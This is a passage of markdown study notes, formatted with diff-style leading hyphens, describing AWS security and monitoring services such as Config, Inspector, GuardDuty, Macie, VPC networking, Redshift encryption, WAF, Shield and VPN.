For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance -* **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in. -* **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information. -* **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created. - -**Configuration History**: It's possible to obtain the configuration history of resources thanks to the configuration items. A configuration history is delivered every 6 hours and contains all CIs for a particular resource type. - -**Configuration Streams**: Configuration items are sent to an SNS Topic to enable analysis of the data. - -**Configuration Snapshots**: Configuration items are used to create a point in time snapshot of all supported resources. - -**S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. 
However, you'll need to grant write access for this service principal, config.amazonaws.com, and your secondary accounts with write access to the S3 bucket in your primary account. - -## Config Rules - -Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allow you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\ -AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted. - -* **AWS Managed rules**: Set of predefined rules that cover a lot of best practices, so it's always worth browsing these rules first before setting up your own as there is a chance that the rule may already exist. -* **Custom rules**: You can create your own rules to check specific custom configurations. - -Limit of 50 config rules per region before you need to contact AWS for an increase.\ -Non compliant results are NOT deleted. - -# SNS Topic - -SNS topic is used as a **configuration stream for notifications** from different AWS services like Config or CloudWatch alarms.\ -You can have various endpoints associated to the SNS stream.\ -You can use SNS topic to send notifications to you via email or to SQS to treat the notification programmatically. - -# Inspector - -The Amazon Inspector service is **agent based**, meaning it requires software agents to be **installed on any EC2 instances** you want to assess. 
This makes it an easy service to be configured and added at any point to existing resources already running within your AWS infrastructure. This helps Amazon Inspector to become a seamless integration with any of your existing security processes and procedures as another level of security. - -These are the tests that AWS Inspector allows you to perform: - -* **CVEs** -* **CIS Benchmarks** -* **Security Best practices** -* **Network Reachability** - -You can make any of those run on the EC2 machines you decide. - -## Elements of AWS Inspector - -**Role**: Create or select a role to allow Amazon Inspector to have read only access to the EC2 instances (DescribeInstances)\ -**Assessment Targets**: Group of EC2 instances that you want to run an assessment against\ -**AWS agents**: Software agents that must be installed on EC2 instances to monitor. Data is sent to Amazon Inspector using a TLS channel. A regular heartbeat is sent from the agent to the inspector asking for instructions. It can autoupdate itself\ -**Assessment Templates**: Define specific configurations as to how an assessment is run on your EC2 instances. An assessment template cannot be modified after creation. - -* Rules packages to be used -* Duration of the assessment run 15min/1hour/8hours -* SNS topics, select when notify: Starts, finished, change state, reports a finding -* Attributes to be assigned to findings - -**Rule package**: Contains a number of individual rules that are checked against an EC2 when an assessment is run. Each one also has a severity (high, medium, low, informational). The possibilities are: - -* Common Vulnerabilities and Exposures (CVEs) -* Center for Internet Security (CIS) Benchmark -* Security Best practices - -Once you have configured the Amazon Inspector Role, the AWS Agents are Installed, the target is configured and the template is configured, you will be able to run it. An assessment run can be stopped, resumed, or deleted. 
- -Amazon Inspector has a pre-defined set of rules, grouped into packages. Each Assessment Template defines which rules packages to be included in the test. Instances are being evaluated against rules packages included in the assessment template. - -{% hint style="info" %} -Note that nowadays AWS already allows you to **autocreate** all the necessary **configurations** and even automatically **install the agents inside the EC2 instances.** -{% endhint %} - -## **Reporting** - -**Telemetry**: data that is collected from an instance, detailing its configuration, behavior and processes during an assessment run. Once collected, the data is then sent back to Amazon Inspector in near-real-time over TLS where it is then stored and encrypted on S3 via an ephemeral KMS key. Amazon Inspector then accesses the S3 Bucket, decrypts the data in memory, and analyzes it against any rules packages used for that assessment to generate the findings. - -**Assessment Report**: Provide details on what was assessed and the results of the assessment. - -* The **findings report** contains the summary of the assessment, info about the EC2 and rules and the findings that occurred. -* The **full report** is the finding report + a list of rules that were passed. - -# Trusted Advisor - -The main function of Trusted Advisor is to **recommend improvements across your AWS account** to help optimize and hone your environment based on **AWS best practices**. These recommendations cover four distinct categories. It's a cross-region service. - -1. **Cost optimization:** which helps to identify ways in which you could **optimize your resources** to save money. -2. **Performance:** This scans your resources to highlight any **potential performance issues** across multiple services. -3. **Security:** This category analyzes your environment for any **potential security weaknesses** or vulnerabilities. -4. 
**Fault tolerance:** Which suggests best practices to **maintain service operations** by increasing resiliency should a fault or incident occur across your resources. - -The full power and potential of AWS Trusted Advisor is only really **available if you have a business or enterprise support plan with AWS**. **Without** either of these plans, then you will only have access to **six core checks** that are freely available to everyone. These free core checks are split between the performance and security categories, with the majority of them being related to security. These are the 6 checks: service limits, Security Groups Specific Ports Unrestricted, Amazon EBS Public Snapshots, Amazon RDS Public Snapshots, IAM Use, and MFA on root account.\ -Trusted advisor can send notifications and you can exclude items from it.\ -Trusted advisor data is **automatically refreshed every 24 hours**, **but** you can perform a **manual one 5 mins after the previous one.** - -# Amazon GuardDuty - -Amazon GuardDuty is a regional-based intelligent **threat detection service**, the first of its kind offered by AWS, which allows users to **monitor** their **AWS account** for **unusual and unexpected behavior by analyzing VPC Flow Logs, AWS CloudTrail management event logs, Cloudtrail S3 data event logs, and DNS logs**. It uses **threat intelligence feeds**, such as lists of malicious IP addresses and domains, and **machine learning** to identify **unexpected and potentially unauthorized and malicious activity** within your AWS environment. This can include issues like escalations of privileges, uses of exposed credentials, or communication with malicious IP addresses, or domains.\ -For example, GuardDuty can detect compromised EC2 instances serving malware or mining bitcoin. 
It also monitors AWS account access behavior for signs of compromise, such as unauthorized infrastructure deployments, like instances deployed in a Region that has never been used, or unusual API calls, like a password policy change to reduce password strength.\ -You can **upload lists of whitelisted and blacklisted IP addresses** so GuardDuty takes that info into account. - -Finding summary: - -* Finding type -* Severity: 7-8.9 High, 4-6.9 Medium, 0.1-3.9 Low -* Region -* Account ID -* Resource ID -* Time of detection -* Which threat list was used - -The body has this information: - -* Resource affected -* Action -* Actor: Ip address, port and domain -* Additional Information - -You can invite other accounts to a different AWS GuardDuty account so **every account is monitored from the same GuardDuty**. The master account must invite the member accounts and then the representative of the member account must accept the invitation.\ -There are different IAM Role permissions to allow GuardDuty to get the information and to allow a user to upload IPs whitelisted and blacklisted.\ -GuardDuty uses a service-linked role called "AWSServiceRoleForAmazonGuardDuty" that allows it to retrieve metadata from affected endpoints. - -You pay for the processing of your log files, per 1 million events per month from CloudTrail and per GB of analysed logs from VPC Flow - -When a user disables GuardDuty, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the existing findings will be lost.\ -If you just stop it, the existing findings will remain. - -# Amazon Macie - -The main function of the service is to provide an automatic method of **detecting, identifying, and also classifying data** that you are storing within your AWS account. - -The service is backed by **machine learning**, allowing your data to be actively reviewed as different actions are taken within your AWS account. 
Machine learning can spot access patterns and **user behavior** by analyzing **CloudTrail event** data to **alert against any unusual or irregular activity**. Any findings made by Amazon Macie are presented within a dashboard which can trigger alerts, allowing you to quickly resolve any potential threat of exposure or compromise of your data. - -Amazon Macie will automatically and continuously **monitor and detect new data that is stored in Amazon S3**. Using the abilities of machine learning and artificial intelligence, this service has the ability to become familiar, over time, with access patterns to data. \ -Amazon Macie also uses natural language processing methods to **classify and interpret different data types and content**. NLP uses principles from computer science and computational linguistics to look at the interactions between computers and the human language. In particular, how to program computers to understand and decipher language data. The **service can automatically assign business values to data that is assessed in the form of a risk score**. This enables Amazon Macie to order findings on a priority basis, enabling you to focus on the most critical alerts first. In addition to this, Amazon Macie also has the added benefit of being able to **monitor and discover security changes governing your data**. As well as identify specific security-centric data such as access keys held within an S3 bucket. - -This protective and proactive security monitoring enables Amazon Macie to identify critical, sensitive, and security focused data such as API keys, secret keys, in addition to PII (personally identifiable information) and PHI data. - -This is useful to avoid data leaks as Macie will detect if you are exposing people's information to the Internet. - -It's a **regional service**. - -It requires the existence of IAM Role 'AWSMacieServiceCustomerSetupRole' and it needs AWS CloudTrail to be enabled. 
- -Pre-defined alert categories: - -* Anonymized access -* Config compliance -* Credential Loss -* Data compliance -* Files hosting -* Identity enumeration -* Information loss -* Location anomaly -* Open permissions -* Privilege escalation -* Ransomware -* Service disruption -* Suspicious access - -The **alert summary** provides detailed information to allow you to respond appropriately. It has a description that provides a deeper level of understanding of why it was generated. It also has a breakdown of the results. - -The user has the possibility to create new custom alerts. - -**Dashboard categorization**: - -* S3 Objects for selected time range -* S3 Objects -* S3 Objects by PII - Personally Identifiable Information -* S3 Objects by ACL -* High-risk CloudTrail events and associated users -* High-risk CloudTrail errors and associated users -* Activity Location -* CloudTrail Events -* Activity ISPs -* CloudTrail user identity types - -**User Categories**: Macie categorises the users in the following categories: - -* **Platinum**: Users or roles considered to be making high risk API calls. Often they have admin privileges. You should monitor them closely in case they are compromised -* **Gold**: Users or roles with history of calling APIs related to infrastructure changes. You should also monitor them -* **Silver**: Users or roles performing medium level risk API calls -* **Bronze**: Users or roles using lowest level of risk based on API calls - -**Identity types:** - -* Root: Request made by root user -* IAM user: Request made by IAM user -* Assumed Role: Request made by temporary assumed credentials (AssumeRole API for STS) -* Federated User: Request made using temporary credentials (GetFederationToken API from STS) -* AWS Account: Request made by a different AWS account -* AWS Service: Request made by an AWS service - -**Data classification**: 4 file classifications exist: - -* Content-Type: list files based on content-type detected. 
The given risk is determined by the type of content detected. -* File Extension: Same as content-type but based on the extension -* Theme: Categorises based on a series of keywords detected within the files -* Regex: Categorises based on specific regexps - -The final risk of a file will be the highest risk found between those 4 categories - -The research function allows you to create your own queries against all Amazon Macie data and perform a deep dive analysis of the data. You can filter results based on: CloudTrail Data, S3 Bucket properties and S3 Objects - -It is possible to invite other accounts to Amazon Macie so several accounts share Amazon Macie. - -# Route 53 - -You can very easily create **health checks for web pages** via Route53. For example you can create HTTP checks on port 80 to a page to check that the web server is working. - -Route 53 service is mainly used for checking the health of the instances. To check the health of the instances we can ping a certain DNS point and we should get response from the instance if the instances are healthy. - -# CloudFront - -Amazon CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be charged for the storage used by S3. 
- -The log files capture data over a period of time, and the amount of log files that are generated depends on the amount of requests that are received by Amazon CloudFront for that distribution. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**. - -**By default cookie logging is disabled** but you can enable it. - -# VPC - -## VPC Flow Logs - -Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets both public and private and also between different VPCs through VPC peering connections. **VPC Flow Logs allows you to capture IP traffic information that flows between your network interfaces of your resources within your VPC**. - -Unlike S3 access logs and CloudFront access logs, the **log data generated by VPC Flow Logs is not stored in S3. Instead, the log data captured is sent to CloudWatch logs**. - -Limitations: - -* If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account. -* If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces -* Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one. -* The following traffic is not monitored and captured by the logs. DHCP traffic within the VPC, traffic from instances destined for the Amazon DNS Server. 
-
* Any traffic destined to the IP address for the VPC default router and traffic to and from the following addresses, 169.254.169.254 which is used for gathering instance metadata, and 169.254.169.123 which is used for the Amazon Time Sync Service. -* Traffic relating to an Amazon Windows activation license from a Windows instance -* Traffic between a network load balancer interface and an endpoint network interface - -For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these **logs captures data during a window of approximately 10 to 15 minutes**. - -![](<../.gitbook/assets/image (432).png>) - -![](<../.gitbook/assets/image (433).png>) - -## Subnets - -Subnets help to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure.\ -Valid CIDR are from a /16 netmask to a /28 netmask.\ -A subnet cannot be in different availability zones at the same time. - -By having **multiple Subnets with similar resources grouped together**, it allows for greater security management. By implementing **network level virtual firewalls,** called network access control lists, or **NACLs**, it's possible to **filter traffic** on specific ports from both an ingress and egress point at the Subnet level. - -When you create a subnet the **network** and **broadcast address** of the subnet **can't be used** for host addresses and **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: The first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use. 
- -**Public subnets** are those that have **direct access to the Internet, whereas private subnets do not.** - -In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC. This Internet gateway is a managed service, controlled, configured, and maintained by AWS. It scales horizontally automatically, and is classified as a highly valuable component of your VPC infrastructure. Once your Internet gateway is attached to your VPC, you have a gateway to the Internet. However, at this point, your instances have no idea how to get out to the Internet. As a result, you need to add a default route to the route table associated with your subnet. The route could have a **destination value of 0.0.0.0/0, and the target value will be set as your Internet gateway ID**. - -By default, all subnets have the automatic assignment of public IP addresses turned off but it can be turned on. - -**A local route within a route table enables communication between VPC subnets.** - -If you are **connecting a subnet with a different subnet you cannot access the subnets connected** with the other subnet, you need to create a connection with them directly. **This also applies to internet gateways**. You cannot go through a subnet connection to access internet, you need to assign the internet gateway to your subnet. - -## VPC Peering - -VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network. - -Once the peer connectivity is established, **resources in one VPC can access resources in the other**. The connectivity between the VPCs is implemented through the existing AWS network infrastructure, and so it is highly available with no bandwidth bottleneck. 
As **peered connections operate as if they were part of the same network**, there are restrictions when it comes to your CIDR block ranges that can be used.\ -If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\ -Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. **You can't route through one VPC to get to another.** - -# AWS Secrets Manager - -AWS Secrets Manager is a great service to enhance your security posture by allowing you to **remove any hard-coded secrets within your application and replacing them with a simple API call** to the aid of your secrets manager which then services the request with the relevant secret. As a result, AWS Secrets Manager acts as a **single source of truth for all your secrets across all of your applications**. - -AWS Secrets Manager enables the **ease of rotating secrets** and therefore enhancing the security of that secret. An example of this could be your database credentials. Other secret types can also have automatic rotation enabled through the use of lambda functions, for example, API keys. - -Access to your secrets within AWS Secret Manager is governed by fine-grained IAM identity-based policies in addition to resource-based policies. - -To allow a user form a different account to access your secret you need to authorize him to access the secret and also authorize him to decrypt the secret in KMS. The Key policy also needs to allows the external user to use it. 
- -**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.** - -# EMR - -EMR is a managed service by AWS and is comprised of a **cluster of EC2 instances that's highly scalable** to process and run big data frameworks such Apache Hadoop and Spark. - -From EMR version 4.8.0 and onwards, we have the ability to create a **security configuration** specifying different settings on **how to manage encryption for your data within your clusters**. You can either encrypt your data at rest, data in transit, or if required, both together. The great thing about these security configurations is they're not actually a part of your EC2 clusters. - -One key point of EMR is that **by default, the instances within a cluster do not encrypt data at rest**. Once enabled, the following features are available. - -* **Linux Unified Key Setup:** EBS cluster volumes can be encrypted using this method whereby you can specify AWS **KMS** to be used as your key management provider, or use a custom key provider. -* **Open-Source HDFS encryption:** This provides two Hadoop encryption options. Secure Hadoop RPC which would be set to privacy which uses simple authentication security layer, and data encryption of HDFS Block transfer which would be set to true to use the AES-256 algorithm. - -From an encryption in transit perspective, you could enable **open source transport layer security** encryption features and select a certificate provider type which can be either PEM where you will need to manually create PEM certificates, bundle them up with a zip file and then reference the zip file in S3 or custom where you would add a custom certificate provider as a Java class that provides encryption artefacts. - -Once the TLS certificate provider has been configured in the security configuration file, the following encryption applications specific encryption features can be enabled which will vary depending on your EMR version. 
* Hadoop MapReduce encrypted shuffle, which uses TLS.
- -Amazon RDS **sends data to CloudWatch every minute by default.** - -In addition to encryption offered by RDS itself at the application level, there are **additional platform level encryption mechanisms** that could be used for protecting data at rest including **Oracle and SQL Server Transparent Data Encryption**, known as TDE, and this could be used in conjunction with the method order discussed but it would **impact the performance** of the database MySQL cryptographic functions and Microsoft Transact-SQL cryptographic functions. - -If you want to use the TDE method, then you must first ensure that the database is associated to an option group. Option groups provide default settings for your database and help with management which includes some security features. However, option groups only exist for the following database engines and versions. - -Once the database is associated with an option group, you must ensure that the Oracle Transparent Data Encryption option is added to that group. Once this TDE option has been added to the option group, it cannot be removed. TDE can use two different encryption modes, firstly, TDE tablespace encryption which encrypts entire tables and, secondly, TDE column encryption which just encrypts individual elements of the database. - -# Amazon Kinesis Firehouse - -Amazon Firehose is used to deliver **real-time streaming data to different services** and destinations within AWS, many of which can be used for big data such as S3 Redshift and Amazon Elasticsearch. - -The service is fully managed by AWS, taking a lot of the administration of maintenance out of your hands. Firehose is used to receive data from your data producers where it then automatically delivers the data to your chosen destination. - -Amazon Streams essentially collects and processes huge amounts of data in real time and makes it available for consumption. - -This data can come from a variety of different sources. 
For example, log data from the infrastructure, social media, web clicks during feeds, market data, etc. So now we have a high-level overview of each of these. We need to understand how they implement encryption of any data process in stored should it be required. - -When clients are **sending data to Kinesis in transit**, the data can be sent over **HTTPS**, which is HTTP with SSL encryption. However, once it enters the Kinesis service, it is then unencrypted by default. Using both **Kinesis Streams and Firehose encryption, you can assure your streams remain encrypted up until the data is sent to its final destination.** As **Amazon Streams** now has the ability to implement SSE encryption using KMS to **encrypt data as it enters the stream** directly from the producers. - -If Amazon **S3** is used as a **destination**, Firehose can implement encryption using **SSE-KMS on S3**. - -As a part of this process, it's important to ensure that both producer and consumer applications have permissions to use the KMS key. Otherwise encryption and decryption will not be possible, and you will receive an unauthorized KMS master key permission error. - -Kinesis SSE encryption will typically call upon KMS to **generate a new data key every five minutes**. So, if you had your stream running for a month or more, thousands of data keys would be generated within this time frame. - -# Amazon Redshift - -Redshift is a fully managed service that can scale up to over a petabyte in size, which is used as a **data warehouse for big data solutions**. Using Redshift clusters, you are able to run analytics against your datasets using fast, SQL-based query tools and business intelligence applications to gather greater understanding of vision for your business. - -**Redshift offers encryption at rest using a four-tired hierarchy of encryption keys using either KMS or CloudHSM to manage the top tier of keys**. **When encryption is enabled for your cluster, it can't be disable and vice versa**. 
When you have an unencrypted cluster, it can't be encrypted. - -Encryption for your cluster can only happen during its creation, and once encrypted, the data, metadata, and any snapshots are also encrypted. The tiering level of encryption keys are as follows, **tier one is the master key, tier two is the cluster encryption key, the CEK, tier three, the database encryption key, the DEK, and finally tier four, the data encryption keys themselves**. - -## KMS - -During the creation of your cluster, you can either select the **default KMS key** for Redshift or select your **own CMK**, which gives you more flexibility over the control of the key, specifically from an auditable perspective. - -The default KMS key for Redshift is automatically created by Redshift the first time the key option is selected and used, and it is fully managed by AWS. The CMK is known as the master key, tier one, and once selected, Redshift can enforce the encryption process as follows. So Redshift will send a request to KMS for a new KMS key. - -So Redshift will send a request to KMS for a new KMS key. - -This KMS key is then encrypted with the CMK master key, tier one. This encrypted KMS data key is then used as the cluster encryption key, the CEK, tier two. This CEK is then sent by KMS to Redshift where it is stored separately from the cluster. Redshift then sends this encrypted CEK to the cluster over a secure channel where it is stored in memory. - -Redshift then requests KMS to decrypt the CEK, tier two. This decrypted CEK is then also stored in memory. Redshift then creates a random database encryption key, the DEK, tier three, and loads that into the memory of the cluster. The decrypted CEK in memory then encrypts the DEK, which is also stored in memory. - -This encrypted DEK is then sent over a secure channel and stored in Redshift separately from the cluster. Both the CEK and the DEK are now stored in memory of the cluster both in an encrypted and decrypted form. 
The decrypted DEK is then used to encrypt data keys, tier four, that are randomly generated by Redshift for each data block in the database. - -You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets and ensure that bucket logging is enabled, which can be useful for performing security audits and tracking usage patterns in S3. - -## CloudHSM - -When working with CloudHSM to perform your encryption, firstly you must set up a trusted connection between your HSM client and Redshift while using client and server certificates. - -This connection is required to provide secure communications, allowing encryption keys to be sent between your HSM client and your Redshift clusters. Using a randomly generated private and public key pair, Redshift creates a public client certificate, which is encrypted and stored by Redshift. This must be downloaded and registered to your HSM client, and assigned to the correct HSM partition. - -You must then configure Redshift with the following details of your HSM client: the HSM IP address, the HSM partition name, the HSM partition password, and the public HSM server certificate, which is encrypted by CloudHSM using an internal master key. Once this information has been provided, Redshift will confirm and verify that it can connect and access development partition. - -If your internal security policies or governance controls dictate that you must apply key rotation, then this is possible with Redshift enabling you to rotate encryption keys for encrypted clusters, however, you do need to be aware that during the key rotation process, it will make a cluster unavailable for a very short period of time, and so it's best to only rotate keys as and when you need to, or if you feel they may have been compromised. - -During the rotation, Redshift will rotate the CEK for your cluster and for any backups of that cluster. 
It will rotate a DEK for the cluster but it's not possible to rotate a DEK for the snapshots stored in S3 that have been encrypted using the DEK. It will put the cluster into a state of 'rotating keys' until the process is completed when the status will return to 'available'. - -# WAF - -AWS WAF is a web application firewall that helps **protect your web applications** or APIs against common web exploits that may affect availability, compromise security, or consume excessive resources. AWS WAF gives you control over **how traffic reaches your applications** by enabling you to create security rules that block common attack patterns, such as SQL injection or cross-site scripting, and rules that filter out specific traffic patterns you define. - -So there are a number of essential components relating to WAF, these being: Conditions, Rules and Web access control lists, also known as Web ACLs - -## Conditions - -Conditions allow you to specify **what elements of the incoming HTTP or HTTPS request you want WAF to be monitoring** (XSS, GEO - filtering by location-, IP address, Size constraints, SQL Injection attacks, strings and regex matching). Note that if you are restricting a country from cloudfront, this request won't arrive to the waf. - -You can have **100 conditions of each type**, such as Geo Match or size constraints, however **Regex** is the **exception** to this rule where **only 10 Regex** conditions are allowed but this limit is possible to increase. You are able to have **100 rules and 50 Web ACLs per AWS account**. You are limited to **5 rate-based-rules** per account. Finally you can have **10,000 requests per second** when **using WAF** within your application load balancer. - -## Rules - -Using these conditions you can create rules: For example, block request if 2 conditions are met.\ -When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**. 
- -The only **difference** between a rate-based rule and a regular rule is that **rate-based** rules **count** the **number** of **requests** that are being received from a particular IP address over a time period of **five minutes**. - -When you select a rate-based rule option, you are asked to **enter the maximum number of requests from a single IP within a five minute time frame**. When the count limit is **reached**, **all other requests from that same IP address is then blocked**. If the request rate falls back below the rate limit specified the traffic is then allowed to pass through and is no longer blocked. When setting your rate limit it **must be set to a value above 2000**. Any request under this limit is considered a Regular Rule. - -## Actions - -An action is applied to each rule, these actions can either be **Allow**, **Block** or **Count**. - -* When a request is **allowed**, it is **forwarded** onto the relevant CloudFront distribution or Application Load Balancer. -* When a request is **blocked**, the request is **terminated** there and no further processing of that request is taken. -* A **Count** action will **count the number of requests that meet the conditions** within that rule. This is a really good option to select when testing the rules to ensure that the rule is picking up the requests as expected before setting it to either Allow or Block. - -If an **incoming request does not meet any rule** within the Web ACL then the request takes the action associated to a **default action** specified which can either be **Allow** or **Block**. An important point to make about these rules is that they are **executed in the order that they are listed within a Web ACL**. So be careful to architect this order correctly for your rule base, **typically** these are **ordered** as shown: - -1. WhiteListed Ips as Allow. -2. BlackListed IPs Block -3. Any Bad Signatures also as Block. 
- -## CloudWatch - -WAF CloudWatch metrics are reported **in one minute intervals by default** and are kept for a two week period. The metrics monitored are AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests. - -# AWS Firewall Manager - -AWS Firewall Manager simplifies your administration and maintenance tasks across multiple accounts and resources for **AWS WAF, AWS Shield Advanced, Amazon VPC security groups, and AWS Network Firewall**. With Firewall Manager, you set up your AWS WAF firewall rules, Shield Advanced protections, Amazon VPC security groups, and Network Firewall firewalls just once. The service **automatically applies the rules and protections across your accounts and resources**, even as you add new resources. - -It can **group and protect specific resources together**, for example, all resources with a particular tag or all of your CloudFront distributions. One key benefit of Firewall Manager is that it **automatically protects certain resources that are added** to your account as they become active. - -**Requisites**: Created a Firewall Manager Master Account, setup an AWS organization and have added our member accounts and enable AWS Config. - -A **rule group** (a set of WAF rules together) can be added to an AWS Firewall Manager Policy which is then associated to AWS resources, such as your cloudfront distributions or application load balances. - -**Firewall Manager policies only allow "Block" or "Count"** options for a rule group (no "Allow" option). - -# AWS Shield - -AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS. - -**AWS Shield Standard** is **free** to everyone, and it offers DDoS **protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. 
- -**AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**. - -Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.** - -# VPN - -## Site-to-Site VPN - -**Connect your on premisses network with your VPC.** - -### Concepts - -* **VPN connection**: A secure connection between your on-premises equipment and your VPCs. -* **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS. - - Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability. -* **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device. -* **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection. -* **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. -* **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. - -### Limitations - -* IPv6 traffic is not supported for VPN connections on a virtual private gateway. -* An AWS VPN connection does not support Path MTU Discovery. 
- -In addition, take the following into consideration when you use Site-to-Site VPN. - -* When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks. - -## Components of Client VPN - -**Connect from your machine to your VPC** - -### Concepts - -* **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated. -* **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone. -* **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks. -* **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks. -* **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session. -* **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. 
You choose the client CIDR range, for example, `10.2.0.0/16`. -* **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443. -* **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address. -* **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues. -* **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client. - -### Limitations - -* **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table. -* Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.** -* A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint. -* The **client CIDR range cannot be changed** after you create the Client VPN endpoint. 
